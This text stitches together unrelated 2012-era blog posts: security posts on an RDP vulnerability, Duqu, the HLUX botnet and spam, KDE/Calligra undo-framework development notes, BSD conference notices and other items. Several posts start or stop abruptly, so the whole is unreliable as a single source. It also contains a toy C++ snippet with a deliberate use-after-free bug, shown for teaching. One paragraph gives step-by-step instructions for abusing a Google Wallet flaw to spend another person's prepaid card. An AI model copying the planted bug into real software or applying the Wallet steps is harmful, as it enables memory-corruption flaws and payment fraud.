It seems to me that every time a small or medium-sized organization runs a network, the employees or members expect remote access. In turn, the Remote Desktop service is frequently exposed to public networks at organizations of this size, with lazy setups that lack a VPN or any restrictions on communications. RDP best practices should be followed, requiring strong authentication credentials and compartmentalized, restricted network access.
Some enterprises and other large organizations continue to maintain a "walled castle" and leave RDP accessible for support. The problem is that RDP-enabled mobile laptops and devices will make their way to coffee shops or other public wifi networks, where a user may configure a weak connection policy, exposing the laptop to attack. Once the laptop is infected, it comes back inside the walled castle and infects large volumes of other connected systems from within. To help enterprises that may have patch rollout delays, Microsoft is providing a fix-it that adds network layer authentication to the connection, protecting against exploit of the vulnerability.
This past fall, we observed the RDP worm Morto attacking publicly exposed Remote Desktop services across businesses of all sizes with brute force password guessing. It was spreading mainly because of extremely weak and poor password selection for administrative accounts! The Morto worm incident brought attention to poorly secured RDP services. Accordingly, this Remote Desktop vulnerability must be patched immediately. The fact that it's a ring0 use-after-free may complicate the matter, but Microsoft's team is rating its severity a "1" - most likely these characteristics will not delay the development of malicious code for this one. Do not delay patch rollout for CVE-2012-0002.
Finally, for less technical readers, allow me to explain a little about what a "Remote Desktop pre-auth ring0 use-after-free RCE" really is. Remote Desktop is a remotely accessible service that enables folks to connect remotely to a Windows system and open a window to the desktop in an application as though you were sitting in front of the computer. Usually, you need to log in to the system to do that, so the system is fairly protected. Unfortunately, this bug is such that a remote attacker that can connect to the system's Remote Desktop service over the network can successfully attack the system without logging in. The "ring0" piece simply means that the vulnerable code exists deeply in the Windows system internals, or the kernel, of the operating system (most applications running on a system run in "ring3", or "user-mode"). "Use-after-free" is the type of vulnerability enabling the exploit, and this type of flaw is something that continues to be extremely difficult to weed out as predicted years ago, even as many of the more traditional low hanging stack and heap overflows have been stomped out by automated code reviews and better coding practices. And finally, RCE applies to the type of exploit enabled by the vulnerability, or "remote code execution", meaning an attacker can deliver malicious code of their choosing to the system and steal everything. There you go, "pre-auth ring0 use-after-free RCE".
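For the curious, here is a deliberately broken toy fragment, purely illustrative and unrelated to the actual Remote Desktop code, that shows the use-after-free pattern in miniature:

```cpp
// Toy illustration of the use-after-free bug class described above.
#include <cstring>

int main()
{
    char *session = new char[32];
    std::strcpy(session, "active");
    delete[] session;      // the buffer is released here...
    // ...but the stale pointer is still dereferenced below. If an attacker can
    // arrange for their own data to occupy the freed memory, they can influence
    // what the program does next -- the root of many RCE exploits.
    return session[0];     // undefined behaviour: use after free
}
```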
Today is the last day of CanSecWest - a security conference taking place in Vancouver, Canada. On Wednesday I filled in for Costin Raiu and talked about our forensics work into Duqu's C&C servers.
As I'm writing this, Google Chrome just got popped. Again. The general feeling is that $60k, even with a sandbox escape, isn't a whole lot of money for a Chrome zero-day. So, to see multiple zero-days against Chrome is quite the surprise, especially when considering the browser's Pwn2Own track record.
Separately, I found the Q&A session following Facebook's Alex Rice’s presentation immensely intriguing.
"CeBIT is big. Really big. You just won't believe how vastly, hugely, mind-bogglingly big it is. I mean, you may think it's a long way down the road to the chemist's, but that's just peanuts to CeBIT."
I popped along to CeBIT for a day to browse the world's biggest technology show and say hi to the lovely KDE people who were running a stand there.
Ingwa was there in his smartest suit to look all professional. Friedrich and eckhart kept the punters enthused about KDE all day. Claudia and I met with a potential new Akademy sponsor. And Aaron turned up with his fabled Spark.
KDE's stall was in building 2 of 26.
KDE's finest demonstrating the world's finest consumer software to suits
The Ubuntu stand is organised by Ubuntu-DE (many of whom use KDE)
Ingwa acts as booth babe to the Spark Tablet
Amazing what you find at CeBIT: Xompu is a German company who make simplified UIs with Plasma, awesome. This article says it runs Kubuntu. Awesomer.
After the show the large stalls all out-compete each other to have the coolest after party. You could easily become an alcoholic by staying there all week: I got free lager and wiener from a regional government of Germany, free posh beer from some company or other, and free cocktails from Citrix, I think it was, although nobody wanted to talk to me about Citrix. And I can't even drink much more than a sip of alcohol.
While analyzing the components of Duqu, we discovered an interesting anomaly in the main component that is responsible for its business logics, the Payload DLL. We would like to share our findings and ask for help identifying the code.
At first glance, the Payload DLL looks like a regular Windows PE DLL file compiled with Microsoft Visual Studio 2008 (linker version 9.0). The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++. This function is called from the PNF DLL and it is actually the “main” function that implements all the logic of contacting C&C servers, receiving additional payload modules and executing them. The most interesting part is how this logic was programmed and what tools were used.
The code section of the Payload DLL is typical of a binary that was made from several pieces of code. It consists of “slices” of code that may have been initially compiled in separate object files before they were linked into a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions and user-written code, except the biggest slice, which contains most of the C&C interaction code.
Layout of the code section of the Payload DLL file
This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. We call it the Duqu Framework.
As Eugene Kaspersky had written earlier, we were expecting new DDoS attacks on resources covering the Russian presidential election. So, as the country went to the polls on 4 March, we were on the lookout for new DDoS attacks.
We were surprised to hear a news report from one mass media source that claimed a series of attacks from foreign countries had targeted the servers responsible for broadcasting from polling stations. The announcement came at about 21:00, but there was no trace of any attack on our monitoring system. The media report did not clarify exactly what sort of attacks had been staged. Instead of a DDoS attack, the journalists might have been referring to a different method of seizing unauthorized access, such as an SQL injection.
The internet is full of infected hosts. Let's just make a conservative guesstimate that there are more than 40 million infected victim hosts and malware-serving "hosts" connected to the internet at any one time, including traditional computing devices, network devices and smartphones. That's a lot of resources churning out cybercrime, viruses, worms, exploits and spyware. There have been many suggestions about how to go about cleaning up the mess; the challenges are complex, and current cleanups are taking longer than expected.
Mass exploitation continues to be an ongoing effort for cybercriminals and a major problem - it's partly a numbers game for them. Although exploiting and infecting millions of machines may attract LE attention at some point, it's a risk some are willing to take in pursuit of millions of dollars that could probably be better made elsewhere with the same effort. So take, for example, the current DNSChanger cleanup. Here is a traditional profit-motivated 4 million PC and Mac node malware case worked by the FBI, finishing with a successful set of arrests and a server takedown.
EuroBSDcon is the European technical conference for users and developers on BSD-based systems. The EuroBSDcon 2012 conference will be held in Warsaw, Poland from Thursday 18 October 2012 to Sunday 21 October 2012, with tutorials on Thursday and Friday and talks on Saturday and Sunday.
Read more...
This week I've been on Ubuntu release driver duty for Beta 1. Ubuntu has lots of flavours these days and they all need to be nudged to ensure they get their testing and announcements done in time. We only had a few hiccups: some of the flavours had to be respun late last night for fixes and do lots of testing today. Ubuntu (poor under-resourced flavour that it is) also didn't update their upgrade instructions in good time and some grumping at them was needed (sorry, I get grumpy quickly these days with my traumatised brain). Slashdot linked to the wrong URL for downloading Ubuntu CDs so I had to put in a quick redirect to point them at the announcement where the correct URLs are.
Here is the Kubuntu Beta 1 announcement showing nice features like Telepathy-KDE and a big OwnCloud update.
And for anyone worried about the future of Kubuntu, Kubuntu 12.04 to be Supported for 5 Years reaffirms that we will be treating 12.04 like any other LTS, only 2 years longer. It also affirms that we will be continuing Kubuntu in the same way I have run it for the last 7 years, as a successful community made Ubuntu flavour.
Dear All, I am glad to inform you that we are again organizing a "DanuBSDCon" (aka BSD-Day). It is going to be held at the UAS Technikum Wien in Vienna, Austria on Saturday, May 5, 2012 as part of the Austrian Linuxweeks (Linuxwochen).
We would like to invite everybody: anybody who is just looking for an excuse to make a short trip to Central Europe, spend a nice weekend in Vienna, join us for a beer, talk about their favourite topic, meet fellow developers from the region (and from other BSD flavours), or who simply cannot make it to Canada :-)
So, please contact me if you are interested!
As C.Boemann already said, we met at my place for two days in order to fix some serious issues we had with the undo/redo framework in Calligra Words (and Stage for that matter).
The undo/redo framework is something I wrote when I first started contributing to KOffice about 3 years ago. I have to say that I was not really looking forward to having to jump into this stuff again. I am not that much of a masochist, and the memories I have of writing it are not ones of an easy glide.
It actually turned out to be really fun and gratifying. There were some headaches involved to be sure but overall I really enjoyed it.
To summarise a bit (a more detailed description below for the hard-hearted): we use the Qt Scribe framework for our document. When an edit is made on a QTextDocument, it emits a signal indicating that an undo/redo action was added to the QTextDocument's internal undoStack. The application listens to this signal and can create an undo action on its own stack to match QTextDocument's internal one.
The initial framework I created basically followed that behaviour. There was one thing it was never meant to handle: nested commands. This means that when commands were nested, as for example the delete command now contains a deleteInlineObject command, the framework would create two commands on the application's stack.
So C.Boemann and I sat down to think about how to solve that problem. In the end, all we needed was to replace the framework's single head command member with a stack of head commands.
Now we have a framework which is way more complete and solid, plus it is now documented in the code.
There are some improvements we could already think of to make the API a bit more flexible, but we can be confident now that we have solid foundations for the upcoming Calligra Words releases.
Overall, I had a really good time coding with C.Boemann, who is not only a very talented coder but also somebody I really appreciate. It is amazing to see what we achieved in just those two days.
A bit more detail:
As I said, we use QTextDocuments to hold the data of one text frame (text shapes). This document is edited through a specific handler: a KoTextEditor. This editor is not only responsible for editing the QTextDocument but also for listening to the QTextDocument's undoCommandAdded signal and keeping our application's stack in sync.
There are 3 use cases of our undo/redo framework:
- editing done within the KoTextEditor
- complete commands pushed on the KoTextEditor by an external tool
- on-the-fly macro commands
In addition to this, there are two special cases in editing QTextDocument: inserting text and deleting text. These two actions only trigger a signal on the first edit. Any subsequent compatible edit is "merged" into the original edit command and will not trigger a signal. Inserting text and deleting are therefore open ended actions, as far as our framework is concerned.
In order to handle this, a sort of state machine is used. The KoTextEditor can be in a NoOp, KeyPress, Delete, Format or Custom state. Furthermore, for each signal received from the QTextDocument, we create a "dummy" UndoTextCommand, whose sole purpose is to call QTextDocument::undo or QTextDocument::redo. These commands need to be parented to a command which we push on our application's stack. This head command will call undo or redo on all its children when the user presses undo or redo in the application.
In order to allow for nested head commands, we maintain a stack. Its top-most command will be the parent of the signal induced UndoTextCommands.
Depending on the KoTextEditor state and commandStack, new head commands are pushed on the commandStack, or the current top command is popped.
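To make this a bit more concrete, here is a minimal, hedged C++/Qt sketch of the head-command-stack pattern described above. It is not Calligra's actual code: the TextEditorShim class and its beginEditBlock()/endEditBlock() methods are invented stand-ins for KoTextEditor and its state machine, and the dummy UndoTextCommand is simplified, for instance by skipping its first redo() because the edit has already been applied by the time QUndoStack::push() triggers it.

#include <QStack>
#include <QTextDocument>
#include <QUndoCommand>
#include <QUndoStack>

// Dummy command whose sole purpose is to forward undo/redo to the QTextDocument.
class UndoTextCommand : public QUndoCommand
{
public:
    UndoTextCommand(QTextDocument *doc, QUndoCommand *parent)
        : QUndoCommand(QStringLiteral("text edit"), parent), m_doc(doc) {}

    void undo() override { m_doc->undo(); }

    void redo() override
    {
        // The edit already happened when the signal was emitted, so the first
        // redo() (triggered when the head command is pushed) must be a no-op.
        if (m_first) { m_first = false; return; }
        m_doc->redo();
    }

private:
    QTextDocument *m_doc;
    bool m_first = true;
};

// Invented stand-in for KoTextEditor: keeps a stack of "head" commands so that
// nested commands become children of the innermost head instead of ending up
// as extra top-level entries on the application's undo stack.
class TextEditorShim : public QObject
{
public:
    TextEditorShim(QTextDocument *doc, QUndoStack *appStack)
        : m_doc(doc), m_appStack(appStack)
    {
        connect(doc, &QTextDocument::undoCommandAdded,
                this, &TextEditorShim::onUndoCommandAdded);
    }

    // Open a new head command; a nested call simply pushes another head,
    // parented to the current one.
    void beginEditBlock(const QString &title)
    {
        QUndoCommand *parent = m_heads.isEmpty() ? nullptr : m_heads.top();
        m_heads.push(new QUndoCommand(title, parent));
    }

    // Close the innermost head; only the outermost head is pushed onto the
    // application's stack, so one user action stays one undo step.
    void endEditBlock()
    {
        QUndoCommand *head = m_heads.pop();
        if (m_heads.isEmpty())
            m_appStack->push(head);
    }

private:
    void onUndoCommandAdded()
    {
        // Parent the dummy command to the top-most head command, if any.
        QUndoCommand *parent = m_heads.isEmpty() ? nullptr : m_heads.top();
        auto *cmd = new UndoTextCommand(m_doc, parent);
        if (!parent)
            m_appStack->push(cmd); // plain edit outside any edit block
    }

    QTextDocument *m_doc;
    QUndoStack *m_appStack;
    QStack<QUndoCommand *> m_heads;
};

With something like this in place, a compound operation such as deleting a selection that contains an inline object can open one head command, let the nested deleteInlineObject step open and close its own head inside it, and still appear as a single entry on the application's undo stack.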
I will not go into more detail here; if you are interested in the whole gory logic of this, you can look at the code in calligra/libs/kotext/KoTextEditor_undo.cpp (which for now lives in the text_undo_munichsprint git branch). The code has now been pretty well documented, something I had not done before.
That's it for today. Once again, I ask as many of you as possible to try our next test release, and specifically the undo/redo framework, so that we can ensure that we release a really good, stable Calligra Words.
It’s that time of year again, time to fill out your taxes and pay your part. We’ve seen more than a few examples of Tax and IRS related spam. Yesterday I received mail with an interesting approach:
I'm at PierreSt's house in Munich for a minisprint trying to fix the undo system in Calligra Words. I arrived Sunday evening, and we started immediately discussing how we would solve the issues we are facing. Luckily we seem to have the same idea and understanding of the issues.
Today, Monday, we have started hacking. But let me explain a bit about the problems we are having:
Words is using QTextDocument for storage of the actual characters, but we embellish this with all sorts of homegrown stuff for inline images, change tracking etc. QTextDocument has its own undo stack, but since Words can do those other things too, we need to combine that with undo commands of our own.
It's when we need to make macro commands that combine our commands with those of QTextDocument that we run into trouble. Partly because the framework wasn't taking nested commands into consideration, and partly because no one really understood what went on, so we used the framework wrongly. We are now correcting both of these issues.
If all goes well we might create a Release Candidate of Calligra in 2 weeks or so.
The Calligra Suite recently released its 7th beta, mostly because Calligra Words is still not ready. Building a new application from scratch takes time.
Until around October the focus was on writing a new text layout system that could provide the rich text support that any user demands these days. We were not able to reuse the code from KOffice as it was simply not up to the job. So this took a lot of effort.
And then, just as we thought we only had to do the final touches before we could release, we found out that the styles subsystem we (myself included) had created in the KOffice days had huge deficiencies as well. Basically, the user would lose data related to the style hierarchy. It was a complete mess and took 2 months to sort out.
At around the same time we found that the list handling was a complete mess as well (again partly my own fault, but we learn as we go). So we had to sort that out too, which took about the same two months.
Then in December we again tried to do some of the final touches to get the release ready. This time focusing on undo/redo of shapes, and how the shapes are anchored to text. That turned out to take a couple of weeks.
In January we looked at undo/redo for normal text editing and to our horror it turned out to be another can of worms, which we haven't solved yet. It's related to how the purpose of the code has gradually changed; we now need to rethink its structure. On February 19th I'll fly to Munich for a 4 day mini sprint, graciously sponsored by KDE e.V., to sort this out. At least we have a plan for how we will solve it.
When I get back home we'll probably tag an 8th beta.
But during all this fixing we have also implemented a lot of new features: a table of contents, editable footnotes, bibliography, a new statistics docker, a great styles combobox, and a novel approach to the UI in general.
So all in all we have had great progress while also making sure most things work. Obviously we have not solved every little bug, as no application is ever bug free. But at some point we do need to release and that point is coming closer and closer. So stay tuned.
Pretty often I hear people say that Calligra Words is a fork of KWord. As the maintainer, I can tell you this is not true. Sure, we have ripped about 20% of the code from KWord, but even that has been dismantled and reassembled in a new way.
That doesn't constitute a fork. Calligra Words is effectively a new word processor. We have more in common with Stage than we do with KWord. We even started the development of Words by disabling what was KWord, and then we built Words by slowly adding functionality.
KDEPIM Git Resource
You can now monitor any git repository with KMail. Commits will appear as e-mails in the message list.
It will do a git fetch every 5 minutes or so.
This is still a playground project, so it has some limitations:
- Only the master branch is supported so far
- If authentication is needed for the git fetch, you must run ssh-add in the same terminal where you're going to start Akonadi ( ssh-add && akonadictl restart )
While not needing to depend on commitfilter.kde.org or other external notification services is great, this wasn't my primary reason for creating this resource.
I did it because we can, or rather "since KDEPIM>4.4 we can".
Thanks to the new KDEPIM architecture, the application is now really decoupled from the data, and that opens up a world of possibilities for us.
The git resource took me only 8 hours of coding, without needing to touch a single line of KMail code, therefore not introducing any regressions.
The barrier to contribute new features to kontact has never been so low.
--
git clone git://anongit.kde.org/akonadi-git-resource
This is not the first time the HLUX botnet has been mentioned in this blog, but there are still some unanswered questions that we’ve been receiving from the media: What is the botnet’s sphere of activity? What sort of commands does it receive from malicious users? How does the bot spread? How many infected computers are there in the botnet?
Before answering the questions it’s important to clarify that the HLUX botnet we previously disabled is still under control and the infected machines are not receiving commands from the C&C, so they’re not sending spam. Together with Microsoft’s Digital Crimes Unit, SurfNET and Kyrus Tech, Inc., Kaspersky Lab executed a sinkhole operation, which disabled the botnet and its backup infrastructure from the C&C.
The answers below refer to a new version of the HLUX botnet - it's a different botnet, but the malware being used is built from the same HLUX code. Analysis of a new bot version for the HLUX botnet (md5: 010AC0BFF69EB945108B57B40A4784BE, size: 882176 B) revealed the following information.
As we already knew, the bot distributes spam and has the ability to conduct DDoS attacks. In addition, we have discovered that:
Part of the HLUX code that interacts with FTP clients
Part of the HLUX code used to steal Bitcoin wallets
The bot is loaded onto users’ computers from numerous sites hosted on fast flux domains primarily in the .EU domain zone. The bot installs small downloaders (~47 KB) on the system. These downloaders have been detected on computers in the GBOT and Virut botnets. The downloaders can be loaded to computers within minutes of a machine being infected by the malware mentioned above (GBOT and Virut). This distribution method hinders the detection of the primary bot distribution source.
Bot installations have also been detected during drive-by attacks that make use of the Incognito exploit kit.
The number of computers in the new HLUX botnet is estimated to be in the tens of thousands, based on the approximately 8,000 IP addresses detected in operations conducted via P2P.
As before, the HLUX botnet primarily receives commands to distribute spam. However, another malicious program, which we wrote about here, is also being installed on the botnet. Its main functionality is fraudulent manipulation of search engines along the lines of TDSS.
The passwords harvested from FTP are used to place malicious JavaScript on websites that redirects users of the compromised sites once again to the Incognito exploit kit. Exploits for the CVE-2011-3544 vulnerability are primarily used when the bot is installed during these attacks. In other words, HLUX implements a cyclical distribution scheme just like that used by Bredolab.
The HLUX botnet, both old and new, is a classic example of organized crime in action on the Internet. The owners of this botnet take part in just about every type of online scam going: sending spam, theft of passwords, manipulation of search engines, DDoS etc.
It is not uncommon for new versions of botnets to appear; it's one of the challenges we face in the IT security industry. We can neutralize botnet attacks and delay cybercriminal activities, but ultimately the only way to take botnets down is to arrest and prosecute the creators and the groups operating them. This is a difficult task because security companies face different federal policies and legislation in the various countries where botnets are located, which makes law enforcement investigations and legal proceedings long and arduous.
We’ll continue monitoring this particular botnet and keep you up to speed with any technical developments.
P.S. We noticed this on one fast flux domain that was earlier spreading HLUX:
It’s not yet clear whether this is the control panel of the HLUX botnet.
Microsoft is releasing 9 Security Bulletins this month (MS12-008 through MS12-016), patching a total of 21 vulnerabilities. Some of these vulnerabilities may enable remote code execution (RCE) in limited circumstances, and offensive security researchers have claimed that a "bug" fixed this month should be remotely exploitable on the client side, but after months of public circulation there have been no known working exploits.
The highest-priority vulnerabilities patched this month exist in Internet Explorer, a specific version of the C runtime, and the .NET Framework. The Internet Explorer and .NET Framework vulnerabilities may result in drive-by exploits, so consumers and businesses alike should immediately install these patches - mass exploitation is likely to be delivered via COTS exploit packs like Blackhole and its ilk.
Debian developer James Bromberger recently posted the interesting “Debian Wheezy: US$19 Billion. Your price… FREE!”, where he explains why the newest Debian distribution (“Wheezy”) would have taken US$19 billion to develop if it had been developed as proprietary software. This post was picked up in the news article “Perth coder finds new Debian ‘worth’ $18 billion” (by Liam Tung, IT News, February 14, 2012).
You can view this as an update of my More than a Gigabuck: Estimating GNU/Linux’s Size, since it uses my approach and even uses my tool sloccount. Anyone who says “open source software can’t scale to large systems” clearly isn’t paying attention.
Last week researchers found vulnerabilities in the Google Wallet payment system. The first vulnerability was found by Zvelo and required root access. Rooting devices has become just short of trivial at this point with the availability of “one-click root” applications for most platforms. The vulnerability was leveraged to display the current PIN. The very next day a new vulnerability was discovered in how application data is handled in the Wallet app. In this case no root access is needed; as thesmartphonechamp demonstrated, this is simply a flaw in how the application works. Assuming a Google Prepaid card has been set up, a user can navigate to the application management interface and delete the application data for Google Wallet. On return to the app’s interface, the user is then prompted to set up a new PIN. The flaw is that the Google Prepaid card data persists. After establishing a new PIN, the attacker is free to use the prepaid card as though it were their own.
It may not be in the same league as Christmas and New Year, but with every year Valentine’s Day is being exploited more and more by spammers. In the week before it is celebrated this year Valentine’s spam accounted for 0.3% of all spam.
We registered the first Valentine’s spam as far back as 14 January - a whole month before the holiday itself - and it struck us as being rather unusual.
Like the majority of spam mass mailings exploiting the Valentine’s Day theme, this particular mailing was in English. It is a well-known fact that the lion’s share of English-language spam is distributed via partner programs. (Unlike other parts of the world, the practice of small and medium-sized companies ordering spam mailings or sending out spam themselves is not very popular in the USA and most western European countries.) However, the first Valentine’s spam of the year bucked this trend and had nothing to do with a partner program.
This particular offer for Valentine’s Day gifts made use of coupon services.
As you can see from the screenshot, the recipient is urged to buy a small gift for their loved one making use of a discount, an offer which the company made via the major coupon service Groupon.
Coupon services have proved to be a big success around the world. Every day various websites offer special deals on anything from two to several dozen goods or services.
Groupon is one of the biggest Internet projects of its kind and it’s fairly easy to find its promo campaigns online. The site also informs its subscribers about new deals via email. The company that sent out the first Valentine’s spam detected by Kaspersky Lab combined an advert on this major portal and the legitimate Groupon email campaign with its own spam advertising.
We’ve already noted that for small companies coupon services are fast becoming a credible alternative to spam advertising. Judge for yourself: the method used to spread adverts is the same - via email, but spam filters don’t block legitimate mailings from major Internet resources. Another important advantage is that the firms that offer coupon services are not breaking the law. The size of the mailing may well be less than a spam mailing that a company could order, but the legitimate mailing is sent out to the relevant region and the recipients are genuinely interested in special offers sent by coupon services. As a result, a targeted, legitimate mailing can be more effective than the typical ‘carpet bombing’ associated with traditional spam.
Coupon services have had a noticeable impact on mail traffic and Internet advertising. They have also affected spam. There are now a number of spam categories associated with coupon services.
The first is that of unsolicited mailings by the services themselves. This category of spam is quite rare - the more serious companies don’t want to tarnish their reputation by being associated with spam. However, some start-ups trying to break into the market are willing to resort to spam in an attempt to attract subscribers or to allow their platforms to be used for promotions by other companies.
Another category of ‘coupon’ spam is that which simply uses the word “coupons” instead of “discounts” to make goods or services more attractive to users. These spam mailings can offer ‘coupons’ for some of the most unexpected items. For instance, the people behind pharmaceutical spam think nothing of offering a small discount on medications and passing it off as a coupon.
A third category of coupon spam includes things like the Valentine’s spam mentioned above. This involves a company whose offers are already available via a coupon service attempting to reach a wider audience by resorting to spam. As I see it, this approach is counterproductive. The majority of users react negatively to spam, and using it to advertise will only do harm to a company’s reputation. This is especially important as many coupon services rely on the trust of their users. Spam, therefore, can actually work against a coupon service, reducing the effect of a promotion instead of enhancing it.
The potential popularity of coupon services carries with it a specific threat. Users of the services tend to leave some money on their account balance so they can spend it at any time on a deal that takes their fancy. Although the amount of money stored on such accounts may not be very much, it is still likely to attract phishing attacks against the customers of coupon services.
So as not to play into the spammers’ hands, or to avoid falling victim to a phishing attack, when using these coupon services, users need to follow three simple rules:
Coupon services often send purchased coupons as an attachment in an email. If you have not purchased any coupons from the service, there’s a chance that an email attachment might be malicious. If you are not sure whether or not you bought the coupon, you can always check by entering your account. We have not yet detected a malicious attachment disguised as a coupon. Nevertheless, we recommend that users be careful - spammers that participate in partner programs are usually the first to react to new opportunities, including those that involve spreading malicious code. It’s just a matter of time before this type of spam traffic appears.
You’ve probably already heard about the 'Chupa Cabra', literally a "goat sucker". It’s a mythical beast rumored to inhabit parts of the Americas. In recent times it has been allegedly spotted in Puerto Rico (where it was first reported), Mexico and the United States, especially in the latter’s Latin American communities. The name Chupa Cabra has also been adopted by Brazilian carders to name skimmer devices, installed on ATMs. They use this name because the Chupa Cabra will “suck” the information from the victim’s credit card.
The Brazilian media regularly shows videos of bad guys installing their Chupa Cabra onto an ATM. Some of them are unlucky, or incompetent, and get picked up on security cameras and caught by the cops.
That’s what makes installing an ATM skimmer a risky business - and that’s why Brazilian carders have joined forces with local coders to develop an easier, more secure way to steal and clone credit card information. From this unholy alliance, the ‘Chupa Cabra’ malware was born.
A very important “internet trust” discussion is underway that has been hidden behind closed doors for years and, in part, still is. While the Comodo, Diginotar, and Verisign Certificate Authority breaches forced discussion and action into the open, this time the “dissolution of trust” discussion seems to have been triggered voluntarily by Trustwave's policy clarification, and by follow-up discussions on Mozilla's bugzilla tracking and mozilla.dev.security.policy.
The issue at hand is the willful issuance of subordinate CAs from trusted roots for 'managing encrypted traffic', used for MitM eavesdropping, or wiretapping, of SSL/TLS encrypted communications. In other words, individuals attempting to communicate over Twitter, Gmail, Facebook, their banking website and other sensitive sites with their browser may have their secure communications unknowingly sniffed - even their browser or applications are fooled. An active marketplace of hardware devices has been built up around tapping these communications. In certain lawful situations this may be argued as legitimate, as with certain known DLP solutions within corporations, but even then there are other ways for corporate organizations to implement DLP. Why even have CAs if their trust is so easily co-opted? The arbitrary issuance of these certificates without proper oversight or auditing, in light of the policies of browser vendors (and of other software implemented in many servers and on desktops, like NSS), is at the heart of the matter. Should browser, OS and server software vendors continue to extend trust to these Certificate Authorities when the CAs' activities conflict with the software vendors' CA policies?
Many of the apps we enjoy are free. Well, to call them free is a bit misleading. You pay for the apps by looking at advertisements. This is a platform we should all recognize from the sidebar of Facebook, or Google, or almost any service that doesn’t charge a premium to use it. Advertising has paved the way for many services to gather a huge audience and still profit.
On Android and in many cases iOS, the advertisers have gotten very aggressive. They now collect all kinds of data through multiple forms of advertising. I’d like to take a look now at what you can expect.
The Adobe AIR and Adobe Flash Player Incubator program updated their Flash Platform runtime beta program to version 5, delivered as Flash Player version 11.2.300.130. It includes a "sandboxed" version of the 32-bit Flash Player they are calling "Protected Mode for Mozilla Firefox on Windows 7 and Windows Vista systems". It has been over a year since Adobe discussed the Internet Explorer ActiveX Protected Mode version release on their ASSET blog, and the version running on Google Chrome was sandboxed too.
Adobe is building on the successes they have seen with their Adobe Reader X software. Its sandbox technology has substantially raised the bar, driving up the costs of "offensive research" and resulting in a dearth of in-the-wild exploits against Reader X. As in "none" in 2011. This trend reflects the 2011 targeted attack activity that we’ve observed. APT-related attacks in 2011 nailed outdated versions of Adobe Flash software delivered as "authplay.dll" in Adobe Reader v8.x and v9.x, and the general Flash component "NPSWF32.dll" used by older versions of Microsoft Office and other applications. Adobe Reader X just wasn't hit. IE Protected Mode wasn't hit. Chrome's sandboxed Flash wasn't hit. If there are incident handlers out there who saw a different story, please let me know.
The U.S. state of New Hampshire just passed act HB418 (2012), which requires state agencies to consider open source software, promotes the use of open data formats, and requires the commissioner of information technology (IT) to develop an open government data policy. Slashdot has a posted discussion about it. This looks really great, and it looks like a bill that other states might want to emulate. My congrats go to Seth Cohn (the primary author) and the many others who made this happen. In this post I’ll walk through some of its key points on open source software, open standards for data formats, and open government data.
First, here’s what it says about open source software (OSS): “For all software acquisitions, each state agency… shall… Consider whether proprietary or open source software offers the most cost effective software solution for the agency, based on consideration of all associated acquisition, support, maintenance, and training costs…”. Notice that this law does not mandate that the state government must always use OSS. Instead, it simply requires government agencies to consider OSS. You’d think this would be useless, but you’d be wrong. Fairly considering OSS is still remarkably hard to do in many government agencies, so having a law or regulation clearly declare this is very valuable. Yes, closed-minded people can claim they “considered” OSS and paper over their biases, but laws like this make it easier for OSS to get a fair hearing. The law defines “open source software” (OSS) in a way consistent with its usual technical definition, indeed, this law’s definition looks a lot like the free software definition. That’s a good thing; the impact of laws and regulations is often controlled by their definitions, so having good definitions (like this one for OSS) is really important. Here’s the New Hampshire definition of OSS, which I think is a good one:
The material on open standards for data says, “The commissioner shall assist state agencies in the purchase or creation of data processing devices or systems that comply with open standards for the accessing, storing, or transferring of data…” The definition is interesting, too; it defines an “open standard” as a specification “for the encoding and transfer of computer data” that meets a long list of requirements, including that it “Is free for all to implement and use in perpetuity, with no royalty or fee” and that it “Has no restrictions on the use of data stored in the format”. The list is actually much longer; it’s clear that the authors were trying to counter the common tricks of vendors who try to create “open” standards that really aren’t. I think it would have been great if they had adopted the more stringent Digistan definition of open standard, but this is still a great step forward.
Finally, it talks about open government data, e.g., it requires that “The commissioner shall develop a statewide information policy based on the following principles of open government data”. This may be one of the most important parts of the bill, because it establishes these as the open data principles:
The official motto of the U.S. state of New Hampshire is “Live Free or Die”. Looks like they truly do mean to live free.
In this webcast, Kaspersky Lab senior security researcher Roel Schouwenberg talks about the Diginotar certificate authority breach and the implications for trust on the Internet. Schouwenberg also provides a key suggestion for all major Web browser vendors.
It has been four months since Microsoft and Kaspersky Lab announced the disruption of the Kelihos/Hlux botnet. The sinkholing method that was used has its advantages - it is possible to disable a botnet rather quickly without taking control over the infrastructure. However, as this particular case showed, it is not very effective if the botnet’s masters are still at large.
Not long after we disrupted Kelihos/Hlux, we came across new samples that seemed to be very similar to the initial version. After some investigation, we gathered all the differences between the two versions. This is a summary of our findings:
Let’s start with the lowest layer, the encryption and packing of Kelihos/Hlux messages in the communication protocol. For some reason, in the new version, the order of operations was changed. Here are the steps for processing encrypted data to retrieve a job message, which is organized as a tree structure:
Step | Old Hlux | New Hlux
1 | Blowfish with key1 | Blowfish with new key1 |
2 | 3DES with key2 | Decompression with Zlib |
3 | Blowfish with key3 | 3DES with new key2 |
4 | Decompression with Zlib | Blowfish with new key3 |
S. Korean handlers are slow to take down the publicly distributed malicious code exploiting CVE-2012-0003, a vulnerability patched in Microsoft's January 2012 patch release MS12-004. We have discussed with reporters that the code has been available since the 21st, and a site appears to have been publicly attacking very low numbers of Korean users over the past day or so. The site remains up at this time.
This website (www.dwheeler.com) was down part of the day yesterday due to a mistake made by my web hosting company. Sorry about that. It’s back up, obviously.
For those who are curious what happened, here’s the scoop. My hosting provider (WebHostGiant) moved my site to a new improved computer. By itself, that’s great. That new computer has a different IP address (the old one was 207.55.250.19, the new one is 208.86.184.80). That’d be fine too, except they didn’t tell me that they were changing my site’s IP address, nor did they forward the old IP address. The mistake is that the web hosting company should have notified me of this change, ahead of time, but they failed to do so. As a result, I didn’t change my site’s DNS entries (which I control) to point to its new location; I didn’t even know that I should, or what the new values would be. My provider didn’t even warn me ahead of time that anything like this was going to happen… if they had, I could have at least changed the DNS timeouts so the changeover would have been quick.
Now to their credit, once I put in a trouble ticket (#350465), Alex Prokhorenko (of WebhostGIANT Support Services) responded promptly, and explained what happened so clearly that it was easy for me to fix things. I appreciate that they’re upgrading the server hardware, I understand that IP addresses sometimes must change, and I appreciate their low prices. In fact, I’ve been generally happy with them.
But if you’re a hosting provider, you need to tell the customer if some change you make will make your customer’s entire site unavailable without the customer taking some action! A simple email ahead-of-time would have eliminated the whole problem.
Grumble grumble.
